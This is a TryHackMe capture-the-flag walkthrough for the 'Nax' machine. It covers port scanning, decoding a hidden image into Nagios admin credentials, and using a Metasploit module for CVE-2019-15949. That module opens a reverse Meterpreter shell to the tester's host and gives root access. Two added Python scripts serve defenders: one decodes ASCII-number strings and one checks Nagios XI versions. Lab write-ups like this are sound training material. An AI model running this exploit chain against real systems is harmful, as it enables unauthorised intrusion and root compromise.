Hello, in this post I will walk you through the solution of the machine named "Nax" on the TryHackMe platform. Enjoy the read…
Solution
1 — Using Nmap, I gather detailed information about the open ports and services on the machine.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.242.15
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-10 10:43 +03
Nmap scan report for 10.10.242.15
Host is up (0.079s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
2 — When I inspect the page source I see some numbers. I suspect they are the ASCII codes of characters, and when I convert them I get the string "/PI3T.PNg".
47, 80, 73, 51, 84, 46, 80, 78, 103
/, P, I, 3, T, ., P, N, g
[root:/home/alper/Desktop/TRYHACKME]# wget http://10.10.242.15/PI3T.PNg
--2023-06-10 10:47:37-- http://10.10.242.15/PI3T.PNg
Connecting to 10.10.242.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 982359 (959K) [image/png]
Saving to: ‘PI3T.PNg’
PI3T.PNg 100%[=========================================================================================================================================>] 959.33K 2.30MB/s in 0.4s
2023-06-10 10:47:38 (2.30 MB/s) - ‘PI3T.PNg’ saved [982359/982359]
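The conversion in step 2 was done by hand. As an added example (not part of the original write-up), the script below automates the same idea for a defender reviewing a site: it scans page source for runs of comma-separated numbers, decodes every run that maps entirely to printable ASCII, and reports the hidden strings. The HTML it runs on is a constructed sample that embeds the page's number list in a comment; it is not the machine's real page source.

```python
import re

# Constructed sample page source: an HTML comment hides the same decimal
# ASCII codes shown in step 2, next to an ordinary number list that must
# not be reported.
SAMPLE_HTML = """<html><body>
<!-- 47, 80, 73, 51, 84, 46, 80, 78, 103 -->
<p>Prices: 10, 20</p>
</body></html>"""

# At least four comma-separated numbers of up to three digits each.
NUMBER_RUN = re.compile(r"(?:\b\d{1,3}\b\s*,\s*){3,}\b\d{1,3}\b")


def decode_ascii_run(run):
    """Turn '47, 80, ...' into text; None if any value is not printable ASCII."""
    codes = [int(x) for x in re.findall(r"\d+", run)]
    if not codes or not all(32 <= c <= 126 for c in codes):
        return None
    return "".join(chr(c) for c in codes)


def find_encoded_strings(html):
    """Return (raw_run, decoded_text) for every decodable number run in a page."""
    results = []
    for match in NUMBER_RUN.finditer(html):
        decoded = decode_ascii_run(match.group(0))
        if decoded is not None:
            results.append((match.group(0), decoded))
    return results


if __name__ == "__main__":
    for raw, text in find_encoded_strings(SAMPLE_HTML):
        print(f"{raw!r} -> {text!r}")
```

Runs that decode to a path or filename, as here, are worth checking against the web root: a file that is only reachable through an obfuscated reference is a sign that someone relied on obscurity rather than access control.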
3 — I open the downloaded file in GIMP and save it with the "ppm" extension. I then decode the ppm file with the NPIET tool, which gives me the username "nagiosadmin" and its password.
[root:.../alper/Downloads/npiet-1.3f]# ./npiet /home/alper/Desktop/TRYHACKME/PI3T.ppm
nagiosadmin%*CENSORED*
4 — I start a directory scan.
[root:/home/alper/Desktop/TRYHACKME]# gobuster dir -u http://10.10.242.15/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.242.15/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/10 10:56:45 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/cgi-bin/ (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 1332]
/index.php (Status: 200) [Size: 2968]
/javascript (Status: 301) [Size: 317] [--> http://10.10.242.15/javascript/]
/nagios (Status: 401) [Size: 459]
/server-status (Status: 403) [Size: 277]
5 — I go to the "/nagios" directory and log in. I see that the version is 4.4.2. When I research Nagios CVE reports, I find CVE-2019-15949, described as "Nagios XI before 5.6.6 allows remote command execution as root".
6 — I review the Nagios modules in the Metasploit Framework.
msf6 > search nagios
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution
1 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 2020-10-20 excellent Yes Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
2 exploit/linux/http/nagios_xi_configwizards_authenticated_rce 2021-02-13 excellent Yes Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
3 exploit/linux/http/nagios_xi_mibs_authenticated_rce 2020-10-20 excellent Yes Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection
4 exploit/linux/http/nagios_xi_autodiscovery_webshell 2021-07-15 excellent Yes Nagios XI Autodiscovery Webshell Upload
5 exploit/linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution
6 exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution
7 post/linux/gather/enum_nagios_xi 2018-04-17 normal No Nagios XI Enumeration
8 exploit/linux/http/nagios_xi_magpie_debug 2018-11-14 excellent Yes Nagios XI Magpie_debug.php Root Remote Code Execution
9 exploit/unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection
10 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce 2019-07-29 excellent Yes Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution
11 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 2020-12-19 excellent Yes Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection
12 auxiliary/scanner/http/nagios_xi_scanner normal No Nagios XI Scanner
13 exploit/unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution
14 exploit/unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution
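Step 5 and the module list in step 6 together give five affected Nagios XI version ranges. As an added example (not from the original write-up or from Metasploit), the script below turns those ranges into a patch-status check an administrator can run against the version reported by an install: it parses a version string, tests it against each range exactly as stated on this page, and lists the advisories that still apply. The version banner it parses is the line printed by the exploit module in step 7.

```python
import re

# Affected Nagios XI ranges exactly as worded on this page (CVE description in
# step 5, Metasploit module titles in step 6). Fields: label, lowest affected
# version or None, upper bound, whether the upper bound is itself affected.
ADVISORIES = [
    ("CVE-2019-15949: getprofile.sh RCE, before 5.6.6", None, "5.6.6", False),
    ("Snmptrap authenticated RCE, 5.5.0-5.7.3", "5.5.0", "5.7.3", True),
    ("ConfigWizards authenticated RCE, 5.5.6 to 5.7.5", "5.5.6", "5.7.5", True),
    ("Mibs.php authenticated RCE, 5.6.0-5.7.3", "5.6.0", "5.7.3", True),
    ("Plugins filename authenticated RCE, before 5.8.0", None, "5.8.0", False),
]


def parse_version(text):
    """'5.5.6' -> (5, 5, 6); tuples compare component-wise like version numbers."""
    return tuple(int(part) for part in text.strip().split("."))


def is_affected(version, low, high, high_inclusive):
    """True when `version` lies in [low, high] (inclusive) or [low, high) as requested."""
    v = parse_version(version)
    if low is not None and v < parse_version(low):
        return False
    h = parse_version(high)
    return v <= h if high_inclusive else v < h


def applicable_advisories(version):
    """Labels of every advisory on this page that covers the given Nagios XI version."""
    return [label for label, low, high, inclusive in ADVISORIES
            if is_affected(version, low, high, inclusive)]


def parse_version_banner(line):
    """Extract the version from a line such as the step 7 output
    '[*] Target is Nagios XI with version 5.5.6.'; None if absent."""
    match = re.search(r"version\s+(\d+(?:\.\d+)*)", line)
    return match.group(1) if match else None


if __name__ == "__main__":
    banner = "[*] Target is Nagios XI with version 5.5.6."  # line from step 7
    version = parse_version_banner(banner)
    for label in applicable_advisories(version):
        print(f"Nagios XI {version} is covered by: {label}")
```

For the 5.5.6 install seen later in this write-up, four of the five ranges apply; only the Mibs.php issue (5.6.0 and later) does not. Upgrading past 5.8.0 clears every range listed on this page.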
7 — Based on the report's description, I use the "exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce" module.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 10.8.94.51
LHOST => 10.8.94.51
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 10.10.242.15
RHOSTS => 10.10.242.15
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD *CENSORED*
PASSWORD => *CENSORED*
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[*] Started reverse TCP handler on 10.8.94.51:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 10.10.242.15
[*] Meterpreter session 1 opened (10.8.94.51:4444 -> 10.10.242.15:37986) at 2023-06-10 11:05:28 +0300
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.
meterpreter >
8 — As the root user I obtain both flags.
meterpreter > shell
Process 10231 created.
Channel 1 created.
whoami
root
SHELL=/bin/bash script -q /dev/null
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cd /home
cd /home
root@ubuntu:/home# ls
ls
galand
root@ubuntu:/home# cd galand
cd galand
root@ubuntu:/home/galand# ls
ls
nagiosxi user.txt
root@ubuntu:/home/galand# cat user.txt
cat user.txt
*CENSORED*
root@ubuntu:/home/galand# cat /root/root.txt
cat /root/root.txt
*CENSORED*